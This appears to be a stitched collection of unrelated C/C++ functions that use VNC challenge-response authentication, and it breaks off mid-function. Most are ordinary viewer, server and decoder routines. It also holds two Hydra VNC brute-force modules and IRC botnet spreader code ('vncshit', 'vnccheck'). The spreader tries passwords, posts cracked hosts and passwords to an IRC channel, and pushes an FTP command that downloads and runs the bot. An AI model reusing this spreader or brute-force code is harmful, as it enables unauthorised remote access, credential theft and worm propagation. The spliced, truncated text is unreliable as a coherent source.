bool ParseDisplay(char *display, char *phost, int hostlen, int *pport, unsigned char *challengedid)
{
logp(DEBUG, "ParseDisplay: '%s'", display);
unsigned char challenge[CHALLENGESIZE];
char tmp_id[MAX_HOST_NAME_LEN + 1];
char *colonpos = strchr(display, ':');
int tmp_code;
if (hostlen < (int)strlen(display)) return false;
if (colonpos == NULL) return false;
strncpy(phost, display, colonpos - display);
phost[colonpos - display] = '\0';
memset(tmp_id, 0, sizeof(tmp_id));
if (sscanf(colonpos + 1, "%d", &tmp_code) != 1) return false;
if (sscanf(colonpos + 1, "%s", tmp_id) != 1) return false;
// encrypt
memset(challenge, 0, CHALLENGESIZE);
memcpy(challenge, challenge_key, CHALLENGESIZE);
vncEncryptBytes(challenge, tmp_id);
memset(challengedid, 0, CHALLENGESIZE);
memcpy(challengedid, challenge, CHALLENGESIZE);
*pport = tmp_code;
return true;
}
/* for this method, rfbAuthPasswdData is really a pointer to an array
of char*'s, where the last pointer is 0. */
Bool rfbCheckPasswordByList(rfbClientPtr cl,const char* response,int len)
{
char **passwds;
for(passwds=(char**)cl->screen->rfbAuthPasswdData;*passwds;passwds++) {
vncEncryptBytes(cl->authChallenge, *passwds);
if (memcmp(cl->authChallenge, response, len) == 0)
return(TRUE);
}
rfbLog("rfbAuthProcessClientMessage: authentication failed from %s\n",
cl->host);
return(FALSE);
}
int start_vnc(int s,int port, unsigned char options,char *miscptr,FILE *fp) {
char *empty = "";
char *pass;
if (strlen(pass = hydra_get_next_password()) == 0) pass = empty;
if ((buf = hydra_receive_line(s)) == NULL) return 1;
buf[CHALLENGESIZE] = 0;
vncEncryptBytes(buf, pass);
if (hydra_send(s, buf, CHALLENGESIZE, 0) < 0) {
return 1;
}
free(buf);
if ((buf = hydra_receive_line(s)) == NULL) return(1);
switch (buf[3]) {
case 0: hydra_report_found(port, "vnc", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
case 1: free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
case 2: free(buf);
if (debug) printf("DEBUG: VNC server is angry, waiting for a minute\n");
sleep(60);
return 1;
default: free(buf);
fprintf(stderr, "Error: unknown VNC server response\n");
return 1;
}
return 1; // never reached
}
static Bool
AuthenticateVNC(void)
{
CARD32 authScheme, authResult;
CARD8 challenge[CHALLENGESIZE];
char *passwd;
char buffer[64];
char* cstatus;
int len;
fprintf(stderr, "Performing standard VNC authentication\n");
if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE))
return False;
if (appData.passwordFile) {
passwd = vncDecryptPasswdFromFile(appData.passwordFile);
if (!passwd) {
fprintf(stderr, "Cannot read valid password from file \"%s\"\n",
appData.passwordFile);
return False;
}
} else if (appData.autoPass) {
passwd = buffer;
cstatus = fgets(buffer, sizeof buffer, stdin);
if (cstatus == NULL)
buffer[0] = '\0';
else
{
len = strlen(buffer);
if (len > 0 && buffer[len - 1] == '\n')
buffer[len - 1] = '\0';
}
} else if (appData.passwordDialog) {
passwd = DoPasswordDialog();
} else {
passwd = getpass("Password: "******"Reading password failed\n");
return False;
}
if (strlen(passwd) > 8) {
passwd[8] = '\0';
}
vncEncryptBytes(challenge, passwd);
/* Lose the password from memory */
memset(passwd, '\0', strlen(passwd));
if (!WriteExact(rfbsock, (char *)challenge, CHALLENGESIZE))
return False;
if (!ReadFromRFBServer((char *)&authResult, 4))
return False;
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
fprintf(stderr, "VNC authentication succeeded\n");
break;
case rfbVncAuthFailed:
fprintf(stderr, "VNC authentication failed\n");
return False;
case rfbVncAuthTooMany:
fprintf(stderr, "VNC authentication failed - too many tries\n");
return False;
default:
fprintf(stderr, "Unknown VNC authentication result: %d\n",
(int)authResult);
return False;
}
return True;
}
BOOL
vncClientThread::InitAuthenticate()
{
// Retrieve the local password
char password[MAXPWLEN];
m_server->GetPassword(password);
vncPasswd::ToText plain(password);
// Verify the peer host name against the AuthHosts string
vncServer::AcceptQueryReject verified;
if (m_auth) {
verified = vncServer::aqrAccept;
} else {
verified = m_server->VerifyHost(m_socket->GetPeerName());
}
// If necessary, query the connection with a timed dialog
if (verified == vncServer::aqrQuery) {
vncAcceptDialog *acceptDlg = new vncAcceptDialog(m_server->QueryTimeout(), m_socket->GetPeerName());
if ((acceptDlg == 0) || (!(acceptDlg->DoDialog())))
verified = vncServer::aqrReject;
}
if (verified == vncServer::aqrReject) {
CARD32 auth_val = Swap32IfLE(rfbConnFailed);
char *errmsg = "Your connection has been rejected.";
CARD32 errlen = Swap32IfLE(strlen(errmsg));
if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val)))
return FALSE;
if (!m_socket->SendExact((char *)&errlen, sizeof(errlen)))
return FALSE;
m_socket->SendExact(errmsg, strlen(errmsg));
return FALSE;
}
// By default we disallow passwordless workstations!
if ((strlen(plain) == 0) && m_server->AuthRequired())
{
vnclog.Print(LL_CONNERR, VNCLOG("no password specified for server - client rejected\n"));
// Send an error message to the client
CARD32 auth_val = Swap32IfLE(rfbConnFailed);
char *errmsg =
"This server does not have a valid password enabled. "
"Until a password is set, incoming connections cannot be accepted.";
CARD32 errlen = Swap32IfLE(strlen(errmsg));
if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val)))
return FALSE;
if (!m_socket->SendExact((char *)&errlen, sizeof(errlen)))
return FALSE;
m_socket->SendExact(errmsg, strlen(errmsg));
return FALSE;
}
// By default we filter out local loop connections, because they're pointless
if (!m_server->LoopbackOk())
{
char *localname = strdup(m_socket->GetSockName());
char *remotename = strdup(m_socket->GetPeerName());
// Check that the local & remote names are different!
if ((localname != NULL) && (remotename != NULL))
{
BOOL ok = strcmp(localname, remotename) != 0;
if (localname != NULL)
free(localname);
if (remotename != NULL)
free(remotename);
if (!ok)
{
vnclog.Print(LL_CONNERR, VNCLOG("loopback connection attempted - client rejected\n"));
// Send an error message to the client
CARD32 auth_val = Swap32IfLE(rfbConnFailed);
char *errmsg = "Local loop-back connections are disabled.";
CARD32 errlen = Swap32IfLE(strlen(errmsg));
if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val)))
return FALSE;
if (!m_socket->SendExact((char *)&errlen, sizeof(errlen)))
return FALSE;
m_socket->SendExact(errmsg, strlen(errmsg));
return FALSE;
}
}
}
// Authenticate the connection, if required
if (m_auth || (strlen(plain) == 0))
{
// Send no-auth-required message
CARD32 auth_val = Swap32IfLE(rfbNoAuth);
if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val)))
return FALSE;
}
else
{
// Send auth-required message
CARD32 auth_val = Swap32IfLE(rfbVncAuth);
if (!m_socket->SendExact((char *)&auth_val, sizeof(auth_val)))
return FALSE;
BOOL auth_ok = TRUE;
{
// Now create a 16-byte challenge
char challenge[16];
vncRandomBytes((BYTE *)&challenge);
// Send the challenge to the client
if (!m_socket->SendExact(challenge, sizeof(challenge)))
return FALSE;
// Read the response
char response[16];
if (!m_socket->ReadExact(response, sizeof(response)))\
return FALSE;
// Encrypt the challenge bytes
vncEncryptBytes((BYTE *)&challenge, plain);
// Compare them to the response
for (int i=0; i<sizeof(challenge); i++)
{
if (challenge[i] != response[i])
{
auth_ok = FALSE;
break;
}
}
}
// Did the authentication work?
CARD32 authmsg;
if (!auth_ok)
{
vnclog.Print(LL_CONNERR, VNCLOG("authentication failed\n"));
authmsg = Swap32IfLE(rfbVncAuthFailed);
m_socket->SendExact((char *)&authmsg, sizeof(authmsg));
return FALSE;
}
else
{
// Tell the client we're ok
authmsg = Swap32IfLE(rfbVncAuthOK);
if (!m_socket->SendExact((char *)&authmsg, sizeof(authmsg)))
return FALSE;
}
}
// Read the client's initialisation message
rfbClientInitMsg client_ini;
if (!m_socket->ReadExact((char *)&client_ini, sz_rfbClientInitMsg))
return FALSE;
// If the client wishes to have exclusive access then remove other clients
if (!client_ini.shared && !m_shared)
{
// Which client takes priority, existing or incoming?
if (m_server->ConnectPriority() < 1)
{
// Incoming
vnclog.Print(LL_INTINFO, VNCLOG("non-shared connection - disconnecting old clients\n"));
m_server->KillAuthClients();
} else if (m_server->ConnectPriority() > 1)
{
// Existing
if (m_server->AuthClientCount() > 0)
{
vnclog.Print(LL_CLIENTS, VNCLOG("connections already exist - client rejected\n"));
return FALSE;
}
}
}
// Tell the server that this client is ok
return m_server->Authenticated(m_client->GetClientId());
}
Bool
InitialiseRFBConnection()
{
rfbProtocolVersionMsg pv;
int major,minor;
CARD32 authScheme, reasonLen, authResult;
char *reason;
CARD8 challenge[CHALLENGESIZE];
char *passwd;
int i;
rfbClientInitMsg ci;
if (!ReadFromRFBServer(pv, sz_rfbProtocolVersionMsg)) return False;
pv[sz_rfbProtocolVersionMsg] = 0;
if (sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2) {
fprintf(stderr,"Not a valid VNC server\n");
return False;
}
if (!appData.quiet) {
fprintf(stderr,"VNC server supports protocol version %d.%d (viewer %d.%d)\n",
major, minor, rfbProtocolMajorVersion, rfbProtocolMinorVersion);
}
major = rfbProtocolMajorVersion;
minor = rfbProtocolMinorVersion;
sprintf(pv,rfbProtocolVersionFormat,major,minor);
if (!WriteToRFBServer(pv, sz_rfbProtocolVersionMsg)) return False;
if (!ReadFromRFBServer((char *)&authScheme, 4)) return False;
authScheme = Swap32IfLE(authScheme);
switch (authScheme) {
case rfbConnFailed:
if (!ReadFromRFBServer((char *)&reasonLen, 4)) return False;
reasonLen = Swap32IfLE(reasonLen);
reason = malloc(reasonLen);
if (!ReadFromRFBServer(reason, reasonLen)) return False;
fprintf(stderr,"VNC connection failed: %.*s\n",(int)reasonLen, reason);
return False;
case rfbNoAuth:
if (!appData.quiet) {
fprintf(stderr,"No authentication needed\n");
}
break;
case rfbVncAuth:
if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE)) return False;
if (appData.passwordFile) {
passwd = vncDecryptPasswdFromFile(appData.passwordFile);
if (!passwd) {
fprintf(stderr,"Cannot read valid password from file \"%s\"\n",
appData.passwordFile);
return False;
} /* added this to read the command line password */
} else if (appData.tpass) {
passwd = appData.tpass;
} else {
passwd = getpass("Password: "******"Reading password failed\n");
return False;
}
if (strlen(passwd) > 8) {
passwd[8] = '\0';
}
vncEncryptBytes(challenge, passwd);
/* Lose the password from memory */
for (i = strlen(passwd); i >= 0; i--) {
passwd[i] = '\0';
}
if (!WriteToRFBServer((char *)challenge, CHALLENGESIZE)) return False;
if (!ReadFromRFBServer((char *)&authResult, 4)) return False;
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
if (!appData.quiet) {
fprintf(stderr,"VNC authentication succeeded\n");
}
break;
case rfbVncAuthFailed:
fprintf(stderr,"VNC authentication failed\n");
return False;
case rfbVncAuthTooMany:
fprintf(stderr,"VNC authentication failed - too many tries\n");
return False;
default:
fprintf(stderr,"Unknown VNC authentication result: %d\n",
(int)authResult);
return False;
}
break;
default:
fprintf(stderr,"Unknown authentication scheme from VNC server: %d\n",
(int)authScheme);
return False;
}
ci.shared = 1;
if (!WriteToRFBServer((char *)&ci, sz_rfbClientInitMsg)) return False;
if (!ReadFromRFBServer((char *)&si, sz_rfbServerInitMsg)) return False;
si.framebufferWidth = Swap16IfLE(si.framebufferWidth);
si.framebufferHeight = Swap16IfLE(si.framebufferHeight);
si.format.redMax = Swap16IfLE(si.format.redMax);
si.format.greenMax = Swap16IfLE(si.format.greenMax);
si.format.blueMax = Swap16IfLE(si.format.blueMax);
si.nameLength = Swap32IfLE(si.nameLength);
desktopName = malloc(si.nameLength + 1);
if (!desktopName) {
fprintf(stderr, "Error allocating memory for desktop name, %lu bytes\n",
(unsigned long)si.nameLength);
return False;
}
if (!ReadFromRFBServer(desktopName, si.nameLength)) return False;
desktopName[si.nameLength] = 0;
if (!appData.quiet) {
fprintf(stderr,"Desktop name \"%s\"\n",desktopName);
fprintf(stderr,"Connected to VNC server, using protocol version %d.%d\n",
rfbProtocolMajorVersion, rfbProtocolMinorVersion);
fprintf(stderr,"VNC server default format:\n");
PrintPixelFormat(&si.format);
}
return True;
}
int start_vnc(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *pass;
unsigned char buf2[CHALLENGESIZE + 4];
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
recv(s, buf2, CHALLENGESIZE + 4, 0);
if (vnc_client_version == RFB37) {
int i;
//fprintf(stderr,"number of security types supported: %d\n", buf2[0]);
if (buf2[0] == 0) {
hydra_report(stderr, "[ERROR] VNC server connection failed\n");
hydra_child_exit(0);
}
for (i = 1; i <= buf2[0]; i++) {
//fprintf(stderr,"sec type %u\n",buf2[i]);
//check if weak security types are available
if (buf2[i] <= 0x2) {
buf2[3] = buf2[i];
break;
}
}
}
//supported security type
switch (buf2[3]) {
case 0x0:
hydra_report(stderr, "[ERROR] VNC server told us to quit %c\n", buf[3]);
hydra_child_exit(0);
case 0x1:
hydra_report(fp, "VNC server does not require authentication.\n");
if (fp != stdout)
hydra_report(stdout, "VNC server does not require authentication.\n");
hydra_report_found_host(port, ip, "vnc", fp);
hydra_completed_pair_found();
hydra_child_exit(2);
case 0x2:
//VNC security type supported is the only type supported for now
if (vnc_client_version == RFB37) {
sprintf(buf, "%c", 0x2);
if (hydra_send(s, buf, strlen(buf), 0) < 0) {
return 1;
}
//get authentication challenge from server
if (recv(s, buf2, CHALLENGESIZE, 0) == -1)
return 1;
//send response
vncEncryptBytes(buf2, pass);
if (hydra_send(s, (char *) buf2, CHALLENGESIZE, 0) < 0) {
return 1;
}
} else {
//in old proto, challenge is following the security type
vncEncryptBytes((unsigned char *) buf2 + 4, pass);
if (hydra_send(s, (char *) buf2 + 4, CHALLENGESIZE, 0) < 0) {
return 1;
}
}
break;
default:
hydra_report(stderr, "[ERROR] unknown VNC security type\n");
hydra_child_exit(2);
}
//check security result value
recv(s, buf, 4, 0);
if (buf == NULL)
return 1;
switch (buf[3]) {
case 0x0:
hydra_report_found_host(port, ip, "vnc", fp);
hydra_completed_pair_found();
free(buf);
failed_auth = 0;
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
case 0x1:
free(buf);
if (verbose)
hydra_report(stderr, "[VERBOSE] Authentication failed for password %s\n", pass);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
default:
free(buf);
hydra_report(stderr, "[ERROR] unknown VNC server security result %d\n", buf[3]);
return 1;
}
return 1; /* never reached */
}
static gboolean
rfb_decoder_state_wait_for_security (RfbDecoder * decoder)
{
guint8 *buffer = NULL;
/*
* Version 3.3 The server decides the security type and sends a single word
*
* The security-type may only take the value 0, 1 or 2. A value of 0 means that the
* connection has failed and is followed by a string giving the reason, as described
* above.
*/
if (IS_VERSION_3_3 (decoder)) {
buffer = rfb_decoder_read (decoder, 4);
decoder->security_type = RFB_GET_UINT32 (buffer);
GST_DEBUG ("security = %d", decoder->security_type);
g_return_val_if_fail (decoder->security_type < 3, FALSE);
g_return_val_if_fail (decoder->security_type != SECURITY_FAIL,
rfb_decoder_state_reason (decoder));
g_free (buffer);
buffer = NULL;
} else {
/* \TODO Add behavoir for the rfb 3.7 and 3.8 servers */
GST_WARNING ("Other versions are not yet supported");
}
switch (decoder->security_type) {
case SECURITY_NONE:
GST_DEBUG ("Security type is None");
if (IS_VERSION_3_8 (decoder)) {
decoder->state = rfb_decoder_state_security_result;
} else {
decoder->state = rfb_decoder_state_send_client_initialisation;
}
break;
case SECURITY_VNC:
/*
* VNC authentication is to be used and protocol data is to be sent unencrypted. The
* server sends a random 16-byte challenge
*/
GST_DEBUG ("Security type is VNC Authentication");
/* VNC Authentication can't be used if the password is not set */
if (!decoder->password) {
GST_WARNING
("VNC Authentication can't be used if the password is not set");
return FALSE;
}
buffer = rfb_decoder_read (decoder, 16);
vncEncryptBytes ((unsigned char *) buffer, decoder->password);
rfb_decoder_send (decoder, buffer, 16);
g_free (buffer);
GST_DEBUG ("Encrypted challenge send to server");
decoder->state = rfb_decoder_state_security_result;
break;
default:
GST_WARNING ("Security type is not known");
return FALSE;
break;
}
return TRUE;
}
int vncshit(EXINFO exinfo, char *passwd)
{
char sendbuf[IRCLINE];
struct sockaddr_in ssin;
SOCKET sock = fsocket(AF_INET,SOCK_STREAM,0);
if (sock == INVALID_SOCKET)
return FALSE;
int m_majorVersion, m_minorVersion;
ssin.sin_addr.s_addr= finet_addr(exinfo.ip);
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(fconnect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
sprintf(sendbuf,"VNC[-] Could not connect to %s", exinfo.ip);
addlog(sendbuf);
return false;
}
rfbProtocolVersionMsg pv;
ReadExact(sock, pv, sz_rfbProtocolVersionMsg);
pv[sz_rfbProtocolVersionMsg] = 0;
m_majorVersion = rfbProtocolMajorVersion;
m_minorVersion = rfbProtocolMinorVersion;
if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) {
sprintf(sendbuf,"VNC[%d.%d] %s Auth ByPass Vuln!!!", m_majorVersion, m_minorVersion, exinfo.ip);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
addlog(sendbuf);
return false;
}
sprintf(pv,rfbProtocolVersionFormat,m_majorVersion,m_minorVersion);
WriteExact(sock, pv, sz_rfbProtocolVersionMsg);
CARD32 authScheme, authResult;
CARD8 challenge[CHALLENGESIZE];
ReadExact(sock,(char *)&authScheme, 4);
authScheme = Swap32IfLE(authScheme);
switch (authScheme) {
case rfbConnFailed:
sprintf(sendbuf,"VNC[-] %s connection failed", exinfo.ip);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
case rfbNoAuth:
sprintf(sendbuf,"VNC[%d.%d] %s NoPass !!!", m_majorVersion, m_minorVersion, exinfo.ip);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
ExitThread(1);
addlog(sendbuf);
return false;
case rfbVncAuth:
{
ReadExact(sock ,(char *)challenge, CHALLENGESIZE);
if (strlen(passwd) > 8) {
passwd[8] = '\0';
}
vncEncryptBytes(challenge, passwd);
WriteExact(sock, (char *) challenge, CHALLENGESIZE);
ReadExact(sock, (char *) &authResult, 4);
authResult = Swap32IfLE(authResult);
switch (authResult) {
case rfbVncAuthOK:
sprintf(sendbuf,"CRACKED VNC[%d.%d] %s Pass-> %s !!!", m_majorVersion, m_minorVersion, exinfo.ip, passwd);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
vncSpawn(sock);
addlog(sendbuf);
return false;
case rfbVncAuthFailed:
sprintf(sendbuf,"VNC[%d.%d] %s failed pass: %s!", m_majorVersion, m_minorVersion, exinfo.ip , passwd);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
case rfbVncAuthTooMany:
sprintf(sendbuf,"VNC[-] %s failed pass - too many tries!", exinfo.ip);
//irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
Sleep(10000);
//addlog(sendbuf);
return false;
default:
Sleep(3000);
sprintf(sendbuf,"VNC[-] %s authentication result:%d", exinfo.ip, (int)authResult);
irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
addlog(sendbuf);
return false;
}
break;
}
default:
sprintf(sendbuf,"VNC[-] %s Unknown authentication scheme from VNC server:%d", exinfo.ip);
// irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice );
//addlog(sendbuf);
return false;
}
closesocket(sock);
}
int vnccheck(char *host, char *passwd, SOCKET ircconn) {
SOCKET sock;
SOCKADDR_IN ssin;
ssin.sin_family = AF_INET;
ssin.sin_port = htons(5900);
ssin.sin_addr.s_addr= inet_addr(host);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin))) {
//printf("[-] Could not connect\n");
return 1;
}
char buff[4096];
char ftpline[256];
sprintf(ftpline, "echo open %s %d > ravo &echo user %s %s >> ravo &echo get %s >> ravo &echo bye >> ravo &ftp -n -v -s:ravo &del ravo &%s\r\n", getlocalip(), FTPPORT, "Ravo", "5002", BOTNAME, BOTNAME);
unsigned char vncversion[12];
ReadExact(sock, vncversion, sizeof(vncversion));
if(strstr(vncversion, "RFB")) {
WriteExact(sock, vncversion, sizeof(vncversion));
strtok(vncversion, " ");
int versa = atoi(strtok(NULL, "."));
int versb = atoi(strtok(NULL, "\n"));
//printf("[+] Found VNC %d.%d\n", versa, versb);
char auth[4];
ReadExact(sock, auth, 4);
if(auth[1] == 1 || auth[3] == 1) {
//printf("[+] VNC NoAuth!\n");
sprintf(buff, "PRIVMSG %s :VNC v%d.%d with no pass on host %s\n", CHANNEL, versa, versb, host);
send(ircconn,buff, strlen(buff), 0);
WriteExact(sock, "\0", 1);
VNCRoot(sock, ftpline);
closesocket(sock);
return 1;
}
else if(auth[1] == 2 || auth[3] == 2) {
//printf("[+] VNC needs pass lets brewtf0rc3\n");
char funk[1];
//funk = "0\n";
funk[0] = auth[1];
//funk[1] = '\n';
//printf("funk:\n%s\n%d %d\n", funk, funk[0], funk[1]);
WriteExact(sock, funk, 1); // WTF? I NEED 2 send sumthing or ill not get the challenge
unsigned char challenge[16];
ReadExact(sock, challenge, 16);
vncEncryptBytes(challenge, passwd);
WriteExact(sock, challenge, 16); // send encrypted shit
// see wtf the status is
unsigned char status[4];
ReadExact(sock, status, 4);
if(status[3] == 0) {
//printf("[+] pass ok\n");
sprintf(buff, "PRIVMSG %s :[VNC] v%d.%d with pass %s on ip %s\n", CHANNEL, versa, versb, passwd, host);
send(ircconn,buff, strlen(buff), 0);
WriteExact(sock, "\0", 1);
VNCRoot(sock, ftpline);
closesocket(sock);
return 1;
}
else if(status[3] == 1) {
//printf("[-] pass wrong\n");
return 0;
}
else if(status[3] == 1) {
//printf("[-] 2much connections\n");
return 2;
}
}
else if(auth[1] ==0) {
return 1;
}
}
closesocket(sock);
return 0;
}
static Bool
AuthenticateVNC(void)
{
CARD32 authScheme;
CARD8 challenge[CHALLENGESIZE];
char *passwd;
char buffer[64];
char* cstatus;
int len;
if (!appData.ffInfo) {
fprintf(stderr, "Performing standard VNC authentication\n");
}
if (!ReadFromRFBServer((char *)challenge, CHALLENGESIZE))
return False;
if (appData.play || appData.movie) {
passwd = strdup ("dummy");
return ReadAuthenticationResult();
}
if (appData.passwordFile) {
passwd = vncDecryptPasswdFromFile(appData.passwordFile);
if (!passwd) {
fprintf(stderr, "Cannot read valid password from file \"%s\"\n",
appData.passwordFile);
return False;
}
} else if (appData.autoPass) {
passwd = buffer;
cstatus = fgets(buffer, sizeof buffer, stdin);
if (cstatus == NULL)
buffer[0] = '\0';
else
{
len = strlen(buffer);
if (len > 0 && buffer[len - 1] == '\n')
buffer[len - 1] = '\0';
}
} else if (appData.passwordDialog) {
passwd = DoPasswordDialog();
} else {
passwd = getpass("Password: "******"Reading password failed\n");
return False;
}
if (strlen(passwd) > 8) {
passwd[8] = '\0';
}
vncEncryptBytes(challenge, passwd);
/* Lose the password from memory */
memset(passwd, '\0', strlen(passwd));
if (!WriteExact(rfbsock, (char *)challenge, CHALLENGESIZE))
return False;
return ReadAuthenticationResult();
}
bool VNCRFBproto::initialiseRFBConnection()
{
rfbProtocolVersionMsg pv;
rfbClientInitMsg ci;
int major, minor;
char *reason, *passwd = NULL;
CARD32 authScheme, reasonLen, authResult;
CARD8 challenge[CHALLENGESIZE];
// was trace
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): initializing RFB connection\n");
if (!VNC_sock.ReadFromRFBServer(pv, sz_rfbProtocolVersionMsg))
return false;
pv[sz_rfbProtocolVersionMsg] = 0;
if (sscanf(pv, rfbProtocolVersionFormat, &major, &minor) != 2)
{
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: not a valid VNC server\n");
return false;
}
// was trace
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC server supports protocol version %d.%d (viewer %d.%d)\n",
major, minor, rfbProtocolMajorVersion, rfbProtocolMinorVersion);
major = rfbProtocolMajorVersion;
minor = rfbProtocolMinorVersion;
sprintf(pv, rfbProtocolVersionFormat, major, minor);
if (!VNC_sock.WriteExact(pv, sz_rfbProtocolVersionMsg))
return false;
if (!VNC_sock.ReadFromRFBServer((char *)&authScheme, 4))
return false;
authScheme = (CARD32)swap32IfLE(authScheme);
switch (authScheme)
{
case rfbConnFailed:
if (!VNC_sock.ReadFromRFBServer((char *)&reasonLen, 4))
return false;
reasonLen = swap32IfLE(reasonLen);
reason = new char[reasonLen];
if (!VNC_sock.ReadFromRFBServer(reason, reasonLen))
return false;
// error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC connection failed: %.*s\n", (int)reasonLen, reason);
delete[] reason;
return false;
case rfbNoAuth:
// was trace
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): No authentication needed\n");
break;
case rfbVncAuth:
if (!VNC_sock.ReadFromRFBServer((char *)challenge, CHALLENGESIZE))
return false;
#if 0
if (passwordFile) {//look for a password stored in passwordFile
passwd = vncDecryptPasswdFromFile(passwordFile);
if (!passwd) {
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Cannot read valid password from file \"%s\"\n", passwordFile);
return false;
}
}
if (! passwd || (! strlen(passwd))) {
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: initialiseRFBConnection: reading password failed\n");
return false;
}
if (strlen(passwd) > 8)
passwd[8] = '\0';
#endif
//vncEncryptBytes(challenge, passwd);
if (strlen(passwordFile) > 8)
passwordFile[8] = '\0';
vncEncryptBytes(challenge, passwordFile);
/* Lose the password from memory */
//for (int i = strlen(passwd); i >= 0; i--)
// passwd[i] = '\0';
passwd = passwd;
if (!VNC_sock.WriteExact((char *)challenge, CHALLENGESIZE))
return false;
if (!VNC_sock.ReadFromRFBServer((char *)&authResult, 4))
return false;
authResult = swap32IfLE(authResult);
switch (authResult)
{
case rfbVncAuthOK:
// was trace
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC authentication succeeded\n");
break;
case rfbVncAuthFailed:
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC authentication failed\n");
return false;
case rfbVncAuthTooMany:
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: VNC authentication failed - too many tries\n");
return false;
default:
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Unknown VNC authentication result: %d\n", (int)authResult);
return false;
}
break;
default:
// was error
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection() err: Unknown authentication scheme from VNC server: %d\n", (int)authScheme);
return false;
}
ci.shared = (ShareDesktop ? 1 : 0);
if (!VNC_sock.WriteExact((char *)&ci, sz_rfbClientInitMsg))
return false;
if (!VNC_sock.ReadFromRFBServer((char *)&si, sz_rfbServerInitMsg))
return false;
si.framebufferWidth = swap16IfLE(si.framebufferWidth);
si.framebufferHeight = swap16IfLE(si.framebufferHeight);
si.format.redMax = swap16IfLE(si.format.redMax);
si.format.greenMax = swap16IfLE(si.format.greenMax);
si.format.blueMax = swap16IfLE(si.format.blueMax);
si.nameLength = swap32IfLE(si.nameLength);
desktopName = new char[si.nameLength + 1];
if (!VNC_sock.ReadFromRFBServer(desktopName, si.nameLength))
{
delete[] desktopName;
desktopName = NULL;
return false;
}
desktopName[si.nameLength] = 0;
// was notice
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): Using desktop: %s\n", desktopName);
delete[] desktopName;
desktopName = NULL;
// was 2x trace
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): connected to VNC server, using protocol version %d.%d\n",
rfbProtocolMajorVersion, rfbProtocolMinorVersion);
fprintf(stderr, "VNCRFBproto::initialiseRFBConnection(): VNC server default format:\n");
printPixelFormat(&si.format);
return true;
}
Bool
InitialiseRFBConnection(int sock)
{
rfbProtocolVersionMsg pv;
int major,minor;
Bool authWillWork = True;
CARD32 authScheme, reasonLen, authResult;
char *reason;
CARD8 challenge[CHALLENGESIZE];
char *passwd;
int i;
rfbClientInitMsg ci;
/* if the connection is immediately closed, don't report anything, so
that pmw's monitor can make test connections */
if(listenSpecified)
errorMessageFromReadExact = False;
if(!ReadExact(sock, pv, sz_rfbProtocolVersionMsg)) return False;
errorMessageFromReadExact = True;
pv[sz_rfbProtocolVersionMsg] = 0;
if(sscanf(pv,rfbProtocolVersionFormat,&major,&minor) != 2)
{
fprintf(stderr,"%s: Not a valid VNC server\n",programName);
return False;
}
fprintf(stderr,"%s: VNC server supports protocol version %d.%d "
"(viewer %d.%d)\n",
programName,major,minor,rfbProtocolMajorVersion,
rfbProtocolMinorVersion);
if((major == 3) && (minor < 3))
{
/* if server is before 3.3 authentication won't work */
authWillWork = False;
}
else
{
/* any other server version, just tell it what we want */
major = rfbProtocolMajorVersion;
minor = rfbProtocolMinorVersion;
}
sprintf(pv,rfbProtocolVersionFormat,major,minor);
if(!WriteExact(sock, pv, sz_rfbProtocolVersionMsg)) return False;
if(!ReadExact(sock, (char *)&authScheme, 4)) return False;
authScheme = Swap32IfLE(authScheme);
switch(authScheme)
{
case rfbConnFailed:
if(!ReadExact(sock, (char *)&reasonLen, 4)) return False;
reasonLen = Swap32IfLE(reasonLen);
